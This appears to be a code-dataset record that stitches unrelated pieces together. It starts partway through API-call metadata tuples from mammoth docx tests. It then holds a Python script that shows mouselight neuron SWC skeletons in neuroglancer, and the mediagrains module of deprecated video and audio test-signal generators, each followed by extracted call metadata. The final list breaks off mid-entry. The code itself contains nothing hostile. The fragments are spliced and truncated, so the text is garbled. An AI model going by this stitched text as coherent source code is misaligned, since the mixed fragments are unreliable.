8624), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:bookmarkStart"""'], {}), "('w:bookmarkStart')\n", (8605, 8624), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((8642, 8676), 'mammoth.docx.document_xml.read_document_xml_element', 'read_document_xml_element', (['element'], {}), '(element)\n', (8667, 8676), False, 'from mammoth.docx.document_xml import read_document_xml_element\n'), ((8685, 8717), 'nose.tools.assert_equal', 'assert_equal', (['None', 'result.value'], {}), '(None, result.value)\n', (8697, 8717), False, 'from nose.tools import istest, assert_equal\n'), ((8726, 8759), 'nose.tools.assert_equal', 'assert_equal', (['[]', 'result.messages'], {}), '([], result.messages)\n', (8738, 8759), False, 'from nose.tools import istest, assert_equal\n'), ((8845, 8873), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:huh"""', '{}', '[]'], {}), "('w:huh', {}, [])\n", (8856, 8873), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((8891, 8925), 'mammoth.docx.document_xml.read_document_xml_element', 'read_document_xml_element', (['element'], {}), '(element)\n', (8916, 8925), False, 'from mammoth.docx.document_xml import read_document_xml_element\n'), ((8953, 9014), 'mammoth.results.warning', 'results.warning', (['"""An unrecognised element was ignored: w:huh"""'], {}), "('An unrecognised element was ignored: w:huh')\n", (8968, 9014), False, 'from mammoth import documents, results\n'), ((9023, 9072), 'nose.tools.assert_equal', 'assert_equal', (['[expected_warning]', 'result.messages'], {}), '([expected_warning], result.messages)\n', (9035, 9072), False, 'from nose.tools import istest, assert_equal\n'), ((9157, 9185), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:huh"""', '{}', '[]'], {}), "('w:huh', {}, [])\n", (9168, 9185), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((10667, 10714), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""wp:docPr"""', "{'descr': description}"], {}), "('wp:docPr', {'descr': description})\n", (10678, 10714), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((533, 557), 'mammoth.documents.Text', 'documents.Text', (['"""Hello!"""'], {}), "('Hello!')\n", (547, 557), False, 'from mammoth import documents, results\n'), ((4607, 4622), 'mammoth.documents.tab', 'documents.tab', ([], {}), '()\n', (4620, 4622), False, 'from mammoth import documents, results\n'), ((6706, 6729), 'io.BytesIO', 'io.BytesIO', (['image_bytes'], {}), '(image_bytes)\n', (6716, 6729), False, 'import io\n'), ((7858, 7881), 'io.BytesIO', 'io.BytesIO', (['image_bytes'], {}), '(image_bytes)\n', (7868, 7881), False, 'import io\n'), ((10162, 10177), 'mammoth.docx.xmlparser.text', 'xml_text', (['value'], {}), '(value)\n', (10170, 10177), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((2473, 2510), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:ilvl"""', "{'w:val': '1'}"], {}), "('w:ilvl', {'w:val': '1'})\n", (2484, 2510), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((2524, 2563), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:numId"""', "{'w:val': '42'}"], {}), "('w:numId', {'w:val': '42'})\n", (2535, 2563), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((3777, 3795), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:b"""'], {}), "('w:b')\n", (3788, 3795), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((4138, 4156), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:i"""'], {}), "('w:i')\n", (4149, 4156), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((5505, 5546), 'mammoth.docx.relationships_xml.Relationship', 'Relationship', ([], {'target': '"""http://example.com"""'}), "(target='http://example.com')\n", (5517, 5546), False, 'from mammoth.docx.relationships_xml import Relationships, Relationship\n'), ((6104, 6121), 'mammoth.documents.run', 'documents.run', (['[]'], {}), '([])\n', (6117, 6121), False, 'from mammoth import documents, results\n'), ((6548, 6584), 'mammoth.docx.relationships_xml.Relationship', 'Relationship', ([], {'target': '"""media/hat.png"""'}), "(target='media/hat.png')\n", (6560, 6584), False, 'from mammoth.docx.relationships_xml import Relationships, Relationship\n'), ((7700, 7736), 'mammoth.docx.relationships_xml.Relationship', 'Relationship', ([], {'target': '"""media/hat.png"""'}), "(target='media/hat.png')\n", (7712, 7736), False, 'from mammoth.docx.relationships_xml import Relationships, Relationship\n'), ((9213, 9247), 'mammoth.docx.document_xml.read_document_xml_element', 'read_document_xml_element', (['element'], {}), '(element)\n', (9238, 9247), False, 'from mammoth.docx.document_xml import read_document_xml_element\n'), ((9388, 9416), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:huh"""', '{}', '[]'], {}), "('w:huh', {}, [])\n", (9399, 9416), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((9508, 9542), 'mammoth.docx.document_xml.read_document_xml_element', 'read_document_xml_element', (['element'], {}), '(element)\n', (9533, 9542), False, 'from mammoth.docx.document_xml import read_document_xml_element\n'), ((761, 785), 'mammoth.documents.Text', 'documents.Text', (['"""Hello!"""'], {}), "('Hello!')\n", (775, 785), False, 'from mammoth import documents, results\n'), ((2771, 2807), 'mammoth.documents.numbering_level', 'documents.numbering_level', (['"""1"""', '(True)'], {}), "('1', True)\n", (2796, 2807), False, 'from mammoth import documents, results\n'), ((4904, 4921), 'mammoth.documents.run', 'documents.run', (['[]'], {}), '([])\n', (4917, 4921), False, 'from mammoth import documents, results\n'), ((5277, 5294), 'mammoth.documents.run', 'documents.run', (['[]'], {}), '([])\n', (5290, 5294), False, 'from mammoth import documents, results\n'), ((5753, 5770), 'mammoth.documents.run', 'documents.run', (['[]'], {}), '([])\n', (5766, 5770), False, 'from mammoth import documents, results\n'), ((9468, 9492), 'mammoth.documents.Text', 'documents.Text', (['"""Hello!"""'], {}), "('Hello!')\n", (9482, 9492), False, 'from mammoth import documents, results\n'), ((4804, 4822), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:r"""'], {}), "('w:r')\n", (4815, 4822), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((5177, 5195), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:r"""'], {}), "('w:r')\n", (5188, 5195), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((6648, 6670), 'funk.allows', 'funk.allows', (['docx_file'], {}), '(docx_file)\n', (6659, 6670), False, 'import funk\n'), ((6787, 6813), 'funk.allows', 'funk.allows', (['content_types'], {}), '(content_types)\n', (6798, 6813), False, 'import funk\n'), ((7800, 7822), 'funk.allows', 'funk.allows', (['docx_file'], {}), '(docx_file)\n', (7811, 7822), False, 'import funk\n'), ((7939, 7965), 'funk.allows', 'funk.allows', (['content_types'], {}), '(content_types)\n', (7950, 7965), False, 'import funk\n'), ((1045, 1069), 'mammoth.documents.Text', 'documents.Text', (['"""Hello!"""'], {}), "('Hello!')\n", (1059, 1069), False, 'from mammoth import documents, results\n'), ((1349, 1373), 'mammoth.documents.Text', 'documents.Text', (['"""Hello!"""'], {}), "('Hello!')\n", (1363, 1373), False, 'from mammoth import documents, results\n'), ((10925, 10976), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""a:blip"""', "{'r:embed': relationship_id}"], {}), "('a:blip', {'r:embed': relationship_id})\n", (10936, 10976), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n')] |
from funlib.show.neuroglancer import add_layer, ScalePyramid
import argparse
import daisy
import glob
import neuroglancer
import numpy as np
import os
import webbrowser
from swc_parser import _parse_swc
from pathlib import Path
import itertools
import random
import logging
ngid = itertools.count(start=1)
parser = argparse.ArgumentParser()
parser.add_argument(
"--file", "-f", type=str, action="append", help="The path to the container to show"
)
parser.add_argument(
"--datasets",
"-d",
type=str,
nargs="+",
action="append",
help="The datasets in the container to show",
)
parser.add_argument(
"--synapses",
"-s",
type=str,
action="append",
help="A numpy npz containing synapse annotations as stored by "
"synful.gunpowder.ExtractSynapses",
)
parser.add_argument(
"--time",
"-t",
type=int,
action="store",
dest="minutes",
default=0,
help="How long you want neuroglancer to stay available",
)
parser.add_argument(
"--output",
"-o",
type=str,
action="store",
dest="log",
default="",
help="Where to output url to",
)
args = parser.parse_args()
print("passed in arguments: {}".format(args))
minutes = args.minutes
print("showing neuroglancer for {} minutes".format(minutes))
if args.log != "":
logging.basicConfig(level=logging.INFO, filename=args.log)
else:
logging.basicConfig(level=logging.INFO)
neuroglancer.set_server_bind_address("0.0.0.0")
viewer = neuroglancer.Viewer()
swc_path = Path(
"/nrs/funke/mouselight-v2/2017-07-02",
"consensus-neurons-with-machine-centerpoints-labelled-as-swcs/G-002.swc",
)
swc_path = Path(
"/groups/mousebrainmicro/mousebrainmicro/cluster/2018-07-02/carver/augmented-with-skeleton-nodes-as-swcs/G-002.swc"
)
n5_path = Path(
"/nrs/funke/mouselight-v2/2018-07-02",
"consensus-neurons-with-machine-centerpoints-labelled-as-swcs-carved.n5/",
)
transform = Path("/nrs/mouselight/SAMPLES/2018-07-02/transform.txt")
def load_transform(transform_path: Path):
text = transform_path.open("r").read()
lines = text.split("\n")
constants = {}
for line in lines:
if len(line) > 0:
variable, value = line.split(":")
constants[variable] = float(value)
spacing = (
np.array([constants["sx"], constants["sy"], constants["sz"]])
/ 2 ** (constants["nl"] - 1)
/ 1000
)
origin = spacing * (
(np.array([constants["ox"], constants["oy"], constants["oz"]]) // spacing)
/ 1000
)
return origin, spacing
def swc_to_voxel_coords(swc_coord, origin, spacing):
return np.round((swc_coord - origin) / spacing).astype(int)
# swc
neuron_graph = _parse_swc(swc_path)
origin, spacing = load_transform(transform)
voxel_size = spacing
voxel_size_rounded = np.array((10, 3, 3)[::-1])
nodes = []
edges = []
print(len(neuron_graph.nodes))
for node_a, node_b in neuron_graph.edges:
a = swc_to_voxel_coords(neuron_graph.nodes[node_a]["location"], origin, spacing)
b = swc_to_voxel_coords(neuron_graph.nodes[node_b]["location"], origin, spacing)
pos_u = a
pos_v = b
nodes.append(
neuroglancer.EllipsoidAnnotation(
center=pos_u, radii=(3, 3, 3) / voxel_size, id=next(ngid)
)
)
edges.append(
neuroglancer.LineAnnotation(point_a=pos_u, point_b=pos_v, id=next(ngid))
)
if len(nodes) > 10000:
break
nodes.append(
neuroglancer.EllipsoidAnnotation(
center=pos_v, radii=(1, 1, 1) / voxel_size, id=next(ngid)
)
)
a = daisy.open_ds(str(n5_path.absolute()), "volume")
with viewer.txn() as s:
add_layer(s, a, "volume", shader="rgb", c=[0, 0, 0])
with viewer.txn() as s:
s.layers["edges"] = neuroglancer.AnnotationLayer(
filter_by_segmentation=False, annotation_color="#add8e6", annotations=edges
)
s.layers["nodes"] = neuroglancer.AnnotationLayer(
filter_by_segmentation=False, annotation_color="#ff00ff", annotations=nodes
)
url = str(viewer)
logging.info(url)
import time
time.sleep(60 * minutes)
try:
if minutes < 1:
input("Press ENTER to exit:")
except:
pass
| [
"logging.basicConfig",
"funlib.show.neuroglancer.add_layer",
"argparse.ArgumentParser",
"pathlib.Path",
"neuroglancer.Viewer",
"numpy.round",
"time.sleep",
"neuroglancer.set_server_bind_address",
"numpy.array",
"itertools.count",
"neuroglancer.AnnotationLayer",
"logging.info",
"swc_parser._p... | [((282, 306), 'itertools.count', 'itertools.count', ([], {'start': '(1)'}), '(start=1)\n', (297, 306), False, 'import itertools\n'), ((317, 342), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (340, 342), False, 'import argparse\n'), ((1419, 1466), 'neuroglancer.set_server_bind_address', 'neuroglancer.set_server_bind_address', (['"""0.0.0.0"""'], {}), "('0.0.0.0')\n", (1455, 1466), False, 'import neuroglancer\n'), ((1476, 1497), 'neuroglancer.Viewer', 'neuroglancer.Viewer', ([], {}), '()\n', (1495, 1497), False, 'import neuroglancer\n'), ((1510, 1631), 'pathlib.Path', 'Path', (['"""/nrs/funke/mouselight-v2/2017-07-02"""', '"""consensus-neurons-with-machine-centerpoints-labelled-as-swcs/G-002.swc"""'], {}), "('/nrs/funke/mouselight-v2/2017-07-02',\n 'consensus-neurons-with-machine-centerpoints-labelled-as-swcs/G-002.swc')\n", (1514, 1631), False, 'from pathlib import Path\n'), ((1650, 1781), 'pathlib.Path', 'Path', (['"""/groups/mousebrainmicro/mousebrainmicro/cluster/2018-07-02/carver/augmented-with-skeleton-nodes-as-swcs/G-002.swc"""'], {}), "(\n '/groups/mousebrainmicro/mousebrainmicro/cluster/2018-07-02/carver/augmented-with-skeleton-nodes-as-swcs/G-002.swc'\n )\n", (1654, 1781), False, 'from pathlib import Path\n'), ((1788, 1910), 'pathlib.Path', 'Path', (['"""/nrs/funke/mouselight-v2/2018-07-02"""', '"""consensus-neurons-with-machine-centerpoints-labelled-as-swcs-carved.n5/"""'], {}), "('/nrs/funke/mouselight-v2/2018-07-02',\n 'consensus-neurons-with-machine-centerpoints-labelled-as-swcs-carved.n5/')\n", (1792, 1910), False, 'from pathlib import Path\n'), ((1930, 1986), 'pathlib.Path', 'Path', (['"""/nrs/mouselight/SAMPLES/2018-07-02/transform.txt"""'], {}), "('/nrs/mouselight/SAMPLES/2018-07-02/transform.txt')\n", (1934, 1986), False, 'from pathlib import Path\n'), ((2706, 2726), 'swc_parser._parse_swc', '_parse_swc', (['swc_path'], {}), '(swc_path)\n', (2716, 2726), False, 'from swc_parser import _parse_swc\n'), ((2814, 2840), 'numpy.array', 'np.array', (['(10, 3, 3)[::-1]'], {}), '((10, 3, 3)[::-1])\n', (2822, 2840), True, 'import numpy as np\n'), ((4025, 4042), 'logging.info', 'logging.info', (['url'], {}), '(url)\n', (4037, 4042), False, 'import logging\n'), ((4057, 4081), 'time.sleep', 'time.sleep', (['(60 * minutes)'], {}), '(60 * minutes)\n', (4067, 4081), False, 'import time\n'), ((1309, 1367), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO', 'filename': 'args.log'}), '(level=logging.INFO, filename=args.log)\n', (1328, 1367), False, 'import logging\n'), ((1378, 1417), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO'}), '(level=logging.INFO)\n', (1397, 1417), False, 'import logging\n'), ((3640, 3692), 'funlib.show.neuroglancer.add_layer', 'add_layer', (['s', 'a', '"""volume"""'], {'shader': '"""rgb"""', 'c': '[0, 0, 0]'}), "(s, a, 'volume', shader='rgb', c=[0, 0, 0])\n", (3649, 3692), False, 'from funlib.show.neuroglancer import add_layer, ScalePyramid\n'), ((3742, 3852), 'neuroglancer.AnnotationLayer', 'neuroglancer.AnnotationLayer', ([], {'filter_by_segmentation': '(False)', 'annotation_color': '"""#add8e6"""', 'annotations': 'edges'}), "(filter_by_segmentation=False, annotation_color\n ='#add8e6', annotations=edges)\n", (3770, 3852), False, 'import neuroglancer\n'), ((3886, 3996), 'neuroglancer.AnnotationLayer', 'neuroglancer.AnnotationLayer', ([], {'filter_by_segmentation': '(False)', 'annotation_color': '"""#ff00ff"""', 'annotations': 'nodes'}), "(filter_by_segmentation=False, annotation_color\n ='#ff00ff', annotations=nodes)\n", (3914, 3996), False, 'import neuroglancer\n'), ((2288, 2349), 'numpy.array', 'np.array', (["[constants['sx'], constants['sy'], constants['sz']]"], {}), "([constants['sx'], constants['sy'], constants['sz']])\n", (2296, 2349), True, 'import numpy as np\n'), ((2630, 2670), 'numpy.round', 'np.round', (['((swc_coord - origin) / spacing)'], {}), '((swc_coord - origin) / spacing)\n', (2638, 2670), True, 'import numpy as np\n'), ((2442, 2503), 'numpy.array', 'np.array', (["[constants['ox'], constants['oy'], constants['oz']]"], {}), "([constants['ox'], constants['oy'], constants['oz']])\n", (2450, 2503), True, 'import numpy as np\n')] |
#
# Copyright 2018 British Broadcasting Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""\
The submodule of mediagrains which contains code for generating test video
grains.
This module is deprecated, please use mediagrains.patterngenerators instead.
"""
from fractions import Fraction
from mediatimestamp.immutable import TimeOffset, Timestamp
from copy import deepcopy
import struct
import fractions
from deprecated import deprecated
from . import AudioGrain
from .cogenums import CogFrameFormat, CogAudioFormat
from .patterngenerators.video import LumaSteps as LumaStepsPatternGenerator
from .patterngenerators.video import ColourBars as ColourBarsPatternGenerator
from .patterngenerators.audio import Tone as TonePatternGenerator
from .patterngenerators.audio import Silence as SilencePatternGenerator
__all__ = ["LumaSteps", "Tone1K", "Tone", "Silence", "ColourBars", "MovingBarOverlay"]
# information about formats
# in the order:
# (num_bytes_per_sample, (offset, range), (offset, range), (offset, range), active_bits_per_sample)
# in YUV order
pixel_ranges = {
CogFrameFormat.U8_444: (1, (16, 235-16), (128, 224), (128, 224), 8),
CogFrameFormat.U8_422: (1, (16, 235-16), (128, 224), (128, 224), 8),
CogFrameFormat.U8_420: (1, (16, 235-16), (128, 224), (128, 224), 8),
CogFrameFormat.S16_444_10BIT: (2, (64, 940-64), (512, 896), (512, 896), 10),
CogFrameFormat.S16_422_10BIT: (2, (64, 940-64), (512, 896), (512, 896), 10),
CogFrameFormat.S16_420_10BIT: (2, (64, 940-64), (512, 896), (512, 896), 10),
CogFrameFormat.S16_444_12BIT: (2, (256, 3760-256), (2048, 3584), (2048, 3584), 12),
CogFrameFormat.S16_422_12BIT: (2, (256, 3760-256), (2048, 3584), (2048, 3584), 12),
CogFrameFormat.S16_420_12BIT: (2, (256, 3760-256), (2048, 3584), (2048, 3584), 12),
CogFrameFormat.S16_444: (2, (4096, 60160-4096), (32768, 57344), (32768, 57344), 16),
CogFrameFormat.S16_422: (2, (4096, 60160-4096), (32768, 57344), (32768, 57344), 16),
CogFrameFormat.S16_420: (2, (4096, 60160-4096), (32768, 57344), (32768, 57344), 16),
}
@deprecated(version="2.13.0", reason="Please use mediagrains.patterngenerators instead")
def LumaSteps(src_id, flow_id, width, height,
rate=Fraction(25, 1),
origin_timestamp=None,
cog_frame_format=CogFrameFormat.U8_444,
step=1):
"""Returns a generator for video grains in U8_444 format.
:param src_id: source_id for grains
:param flow_id: flow_id for grains
:param width: width of grains
:param height: height of grains
:param rate: rate of grains
:param origin_timestamp: the origin timestamp of the first grain.
:param step: The number of grains to increment by each time (values above 1 cause skipping)"""
origin_timestamp = origin_timestamp if origin_timestamp is not None else Timestamp.get_time()
yield from LumaStepsPatternGenerator(
src_id,
flow_id,
width,
height,
rate=rate,
cog_frame_format=cog_frame_format)[origin_timestamp::step]
@deprecated(version="2.13.0", reason="Please use mediagrains.patterngenerators instead")
def ColourBars(src_id, flow_id, width, height,
intensity=0.75,
rate=Fraction(25, 1),
origin_timestamp=None,
cog_frame_format=CogFrameFormat.U8_444,
step=1):
"""Returns a generator for colour bar video grains in specified format.
:param src_id: source_id for grains
:param flow_id: flow_id for grains
:param width: width of grains
:param height: height of grains
:param intensity: intensity of colour bars (usually 1.0 or 0.75)
:param rate: rate of grains
:param origin_timestamp: the origin timestamp of the first grain.
:param step: The number of grains to increment by each time (values above 1 cause skipping)"""
origin_timestamp = origin_timestamp if origin_timestamp is not None else Timestamp.get_time()
yield from ColourBarsPatternGenerator(
src_id,
flow_id,
width,
height,
intensity=intensity,
rate=rate,
cog_frame_format=cog_frame_format
)[origin_timestamp::step]
@deprecated(version="2.13.0", reason="Please use mediagrains.patterngenerators instead")
def MovingBarOverlay(grain_gen, height=100, speed=1.0):
"""Call this method and pass an iterable of video grains as the first parameter. This method will overlay a moving black bar onto the grains.
:param grain_gen: An iterable which yields video grains
:param heigh: The height of the bar in pixels
:param speed: A floating point speed in pixels per frame
:returns: A generator which yields video grains
"""
bar = None
for grain in grain_gen:
v_subs = (grain.components[0].height + grain.components[1].height - 1)//grain.components[1].height
if bar is None:
if grain.format not in pixel_ranges:
raise ValueError("Not a supported format for this generator")
_bpp = pixel_ranges[grain.format][0]
bar = [bytearray(grain.components[0].width*_bpp * height),
bytearray(grain.components[1].width*_bpp * height // v_subs),
bytearray(grain.components[2].width*_bpp * height // v_subs)]
for y in range(0, height):
for x in range(0, grain.components[0].width):
bar[0][y*grain.components[0].width * _bpp + _bpp*x + 0] = pixel_ranges[grain.format][1][0] & 0xFF
if _bpp > 1:
bar[0][y*grain.components[0].width * _bpp + _bpp*x + 1] = pixel_ranges[grain.format][1][0] >> 8
for y in range(0, height // v_subs):
for x in range(0, grain.components[1].width):
bar[1][y*grain.components[1].width * _bpp + _bpp*x + 0] = pixel_ranges[grain.format][2][0] & 0xFF
if _bpp > 1:
bar[1][y*grain.components[1].width * _bpp + _bpp*x + 1] = pixel_ranges[grain.format][2][0] >> 8
bar[2][y*grain.components[2].width * _bpp + _bpp*x + 0] = pixel_ranges[grain.format][3][0] & 0xFF
if _bpp > 1:
bar[2][y*grain.components[2].width * _bpp + _bpp*x + 1] = pixel_ranges[grain.format][3][0] >> 8
fnum = int(speed*grain.origin_timestamp.to_count(grain.rate.numerator, grain.rate.denominator))
for y in range(0, height):
grain.data[
grain.components[0].offset + ((fnum + y) % grain.components[0].height)*grain.components[0].stride:
grain.components[0].offset + ((fnum + y) % grain.components[0].height)*grain.components[0].stride + grain.components[0].width*_bpp] = (
bar[0][y*grain.components[0].width * _bpp: (y+1)*grain.components[0].width * _bpp])
for y in range(0, height // v_subs):
grain.data[
grain.components[1].offset + ((fnum//v_subs + y) % grain.components[1].height)*grain.components[1].stride:
grain.components[1].offset + ((fnum//v_subs + y) % grain.components[1].height)*grain.components[1].stride + grain.components[1].width*_bpp] = (
bar[1][y*grain.components[1].width * _bpp: (y+1)*grain.components[1].width * _bpp])
grain.data[
grain.components[2].offset + ((fnum//v_subs + y) % grain.components[2].height)*grain.components[2].stride:
grain.components[2].offset + ((fnum//v_subs + y) % grain.components[2].height)*grain.components[2].stride + grain.components[2].width*_bpp] = (
bar[2][y*grain.components[2].width * _bpp: (y+1)*grain.components[2].width * _bpp])
yield grain
@deprecated(version="2.13.0", reason="Please use mediagrains.patterngenerators instead")
def Tone1K(src_id, flow_id,
samples=1920,
channels=1,
origin_timestamp=None,
cog_audio_format=CogAudioFormat.S16_INTERLEAVED,
step=1,
sample_rate=48000):
return Tone(src_id, flow_id,
1000,
samples=samples,
channels=channels,
origin_timestamp=origin_timestamp,
cog_audio_format=cog_audio_format,
step=step,
sample_rate=sample_rate)
@deprecated(version="2.13.0", reason="Please use mediagrains.patterngenerators instead")
def Tone(src_id, flow_id,
frequency,
samples=1920,
channels=1,
origin_timestamp=None,
cog_audio_format=CogAudioFormat.S16_INTERLEAVED,
step=1,
sample_rate=48000):
origin_timestamp = origin_timestamp if origin_timestamp is not None else Timestamp.get_time()
for grain in TonePatternGenerator(
src_id,
flow_id,
frequency=frequency,
samples=samples,
channels=channels,
cog_audio_format=cog_audio_format,
sample_rate=sample_rate
)[Timestamp()::step]:
grain.origin_timestamp = grain.origin_timestamp + origin_timestamp
grain.sync_timestamp = grain.sync_timestamp + origin_timestamp
yield grain
@deprecated(version="2.13.0", reason="Please use mediagrains.patterngenerators instead")
def Silence(src_id, flow_id,
samples=1920,
channels=1,
origin_timestamp=None,
cog_audio_format=CogAudioFormat.S16_INTERLEAVED,
step=1,
sample_rate=48000):
origin_timestamp = origin_timestamp if origin_timestamp is not None else Timestamp.get_time()
for grain in SilencePatternGenerator(
src_id,
flow_id,
samples=samples,
channels=channels,
cog_audio_format=cog_audio_format,
sample_rate=sample_rate
)[Timestamp()::step]:
grain.origin_timestamp = grain.origin_timestamp + origin_timestamp
grain.sync_timestamp = grain.sync_timestamp + origin_timestamp
yield grain
@deprecated(version="2.13.0", reason="Please use mediagrains.patterngenerators instead")
def AudioGrainsLoopingData(src_id, flow_id,
sample_data,
samples=1920,
channels=1,
origin_timestamp=None,
cog_audio_format=CogAudioFormat.S16_INTERLEAVED,
step=1,
volume=0.5,
sample_rate=48000):
"""
A generator which yields audio grains of a specified format using input
data in the form of a list of floating point values that will be repeated
as samples indefinitely.
"""
data_samples = {}
if cog_audio_format in [CogAudioFormat.S16_PLANES,
CogAudioFormat.S16_PAIRS,
CogAudioFormat.S16_INTERLEAVED]:
formatted_sample_data = [round(x*volume*(1 << 15)) for x in sample_data]
depth = 16
elif cog_audio_format in [CogAudioFormat.S24_PLANES,
CogAudioFormat.S24_PAIRS,
CogAudioFormat.S24_INTERLEAVED]:
formatted_sample_data = [round(x*volume*(1 << 23)) for x in sample_data]
depth = 24
elif cog_audio_format in [CogAudioFormat.S32_PLANES,
CogAudioFormat.S32_PAIRS,
CogAudioFormat.S32_INTERLEAVED]:
formatted_sample_data = [round(x*volume*(1 << 31)) for x in sample_data]
depth = 32
elif cog_audio_format in [CogAudioFormat.FLOAT_PLANES,
CogAudioFormat.FLOAT_PAIRS,
CogAudioFormat.FLOAT_INTERLEAVED]:
formatted_sample_data = [x*volume for x in sample_data]
depth = 'f'
elif cog_audio_format in [CogAudioFormat.DOUBLE_PLANES,
CogAudioFormat.DOUBLE_PAIRS,
CogAudioFormat.DOUBLE_INTERLEAVED]:
formatted_sample_data = [x*volume for x in sample_data]
depth = 'd'
planes = False
pairs = False
interleaved = False
if cog_audio_format in [CogAudioFormat.S16_PLANES,
CogAudioFormat.S24_PLANES,
CogAudioFormat.S32_PLANES,
CogAudioFormat.FLOAT_PLANES,
CogAudioFormat.DOUBLE_PLANES]:
planes = True
elif cog_audio_format in [CogAudioFormat.S16_PAIRS,
CogAudioFormat.S24_PAIRS,
CogAudioFormat.S32_PAIRS,
CogAudioFormat.FLOAT_PAIRS,
CogAudioFormat.DOUBLE_PAIRS]:
pairs = True
elif cog_audio_format in [CogAudioFormat.S16_INTERLEAVED,
CogAudioFormat.S24_INTERLEAVED,
CogAudioFormat.S32_INTERLEAVED,
CogAudioFormat.FLOAT_INTERLEAVED,
CogAudioFormat.DOUBLE_INTERLEAVED]:
interleaved = True
rate = fractions.Fraction(sample_rate, samples)
duration = 1/rate
ag = AudioGrain(src_id, flow_id,
origin_timestamp=origin_timestamp,
cog_audio_format=cog_audio_format,
samples=samples,
channels=channels,
rate=rate,
duration=duration,
sample_rate=sample_rate)
origin_timestamp = ag.origin_timestamp
ots = origin_timestamp
offs = 0
count = 0
def make_samples(offs, samples, channels):
line = [formatted_sample_data[n % len(formatted_sample_data)] for n in range(offs, offs+samples)]
if planes:
line = line * channels
elif pairs:
line = [x for x in line for _ in range(0, 2)] * (channels//2)
elif interleaved:
line = [x for x in line for _ in range(0, channels)]
if depth == 16:
return struct.pack('@' + ('h'*samples*channels), *line)
elif depth == 24:
return b''.join(struct.pack('@i', x)[:3] for x in line)
elif depth == 32:
return struct.pack('@' + ('i'*samples*channels), *line)
elif depth == 'f':
return struct.pack('@' + ('f'*samples*channels), *line)
elif depth == 'd':
return struct.pack('@' + ('d'*samples*channels), *line)
while True:
grain = deepcopy(ag)
grain.origin_timestamp = ots
grain.sync_timestamp = ots
if offs not in data_samples:
data_samples[offs] = make_samples(offs, samples, channels)
grain.data = bytearray(data_samples[offs][:grain.expected_length])
yield grain
offs = (offs + samples*step) % len(formatted_sample_data)
count += samples*step
ots = origin_timestamp + TimeOffset.from_count(count, sample_rate, 1)
| [
"mediatimestamp.immutable.Timestamp.get_time",
"deprecated.deprecated",
"mediatimestamp.immutable.TimeOffset.from_count",
"fractions.Fraction",
"struct.pack",
"copy.deepcopy",
"mediatimestamp.immutable.Timestamp"
] | [((2587, 2679), 'deprecated.deprecated', 'deprecated', ([], {'version': '"""2.13.0"""', 'reason': '"""Please use mediagrains.patterngenerators instead"""'}), "(version='2.13.0', reason=\n 'Please use mediagrains.patterngenerators instead')\n", (2597, 2679), False, 'from deprecated import deprecated\n'), ((3577, 3669), 'deprecated.deprecated', 'deprecated', ([], {'version': '"""2.13.0"""', 'reason': '"""Please use mediagrains.patterngenerators instead"""'}), "(version='2.13.0', reason=\n 'Please use mediagrains.patterngenerators instead')\n", (3587, 3669), False, 'from deprecated import deprecated\n'), ((4721, 4813), 'deprecated.deprecated', 'deprecated', ([], {'version': '"""2.13.0"""', 'reason': '"""Please use mediagrains.patterngenerators instead"""'}), "(version='2.13.0', reason=\n 'Please use mediagrains.patterngenerators instead')\n", (4731, 4813), False, 'from deprecated import deprecated\n'), ((8282, 8374), 'deprecated.deprecated', 'deprecated', ([], {'version': '"""2.13.0"""', 'reason': '"""Please use mediagrains.patterngenerators instead"""'}), "(version='2.13.0', reason=\n 'Please use mediagrains.patterngenerators instead')\n", (8292, 8374), False, 'from deprecated import deprecated\n'), ((8886, 8978), 'deprecated.deprecated', 'deprecated', ([], {'version': '"""2.13.0"""', 'reason': '"""Please use mediagrains.patterngenerators instead"""'}), "(version='2.13.0', reason=\n 'Please use mediagrains.patterngenerators instead')\n", (8896, 8978), False, 'from deprecated import deprecated\n'), ((9721, 9813), 'deprecated.deprecated', 'deprecated', ([], {'version': '"""2.13.0"""', 'reason': '"""Please use mediagrains.patterngenerators instead"""'}), "(version='2.13.0', reason=\n 'Please use mediagrains.patterngenerators instead')\n", (9731, 9813), False, 'from deprecated import deprecated\n'), ((10531, 10623), 'deprecated.deprecated', 'deprecated', ([], {'version': '"""2.13.0"""', 'reason': '"""Please use mediagrains.patterngenerators instead"""'}), "(version='2.13.0', reason=\n 'Please use mediagrains.patterngenerators instead')\n", (10541, 10623), False, 'from deprecated import deprecated\n'), ((2740, 2755), 'fractions.Fraction', 'Fraction', (['(25)', '(1)'], {}), '(25, 